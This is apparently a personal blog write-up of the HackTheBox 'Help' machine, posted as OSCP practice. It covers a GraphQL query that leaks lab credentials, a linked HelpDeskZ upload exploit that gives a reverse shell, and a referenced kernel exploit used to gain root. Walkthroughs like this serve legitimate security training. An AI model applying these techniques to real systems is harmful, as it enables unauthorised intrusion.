OSCP series – Help write-up

Posted on By Sagahiko No Comments on OSCP series – Help write-up
HackTheBox, Machines, OSCP preparation

Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

22, 80, and 3000 ports are open.

Web pages

Port 3000 is uncommon. Checked the page.

The web page displays a message like json.

This kind of thing is called graphql.

I referred to the documentation to learn how to use it.

I managed to find out the user credentials using the query below.

http://help.htb:3000/graphql?query={user{username}}

The discovered username and password are helpme@helpme.com and 5d3c93182bb20f07b994a7f617e99cff.

The password is MD5 hashed. The actual value is godhelpmeplz.

Keep the credential for later use.

Next, I checked the port 80. But it showed the basic Apache server page.

I checked if there are any directories that I can access.

Found a valid one.

user flag

I checked the directory and signed in with the credentials found earlier.

It’s using HelpdeskZ. When this challenge was active, the version of HelpDeskZ was 1.0.2.

I found the exploit from google. https://gist.github.com/SakiiR/b005c6d1c955502cfe1d1dfc959cc0f7

echo md5(“r.php1722700108”);
f79101507c81f666857fd9eaf601af5e

So I can connect the reverse shell by accessing help.htb/support/uploads/tickets/f79101507c81f666857fd9eaf601af5e.php

root flag

$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

The kernel has the exploit. https://www.exploit-db.com/exploits/44298

Let’s copy the exploit and execute it.

file 44298
44298: C source, ASCII text, with CRLF line terminators

I moved it to the target server and compiled it.

Lesson learned

  • uname -a (kernel exploit)
  • graphql
  • searchsploit (It can be used during the OSCP exam)

You may also like

HackTheBox
Hack the box : Codify[easy] write up
CTF
CTF tryout – LootStash write-up
HackTheBox
Hack the box – machine – Blue
HackTheBox
Hack the box – machine – Netmon (CVE-2018-9276)

Leave a Reply

Your email address will not be published. Required fields are marked *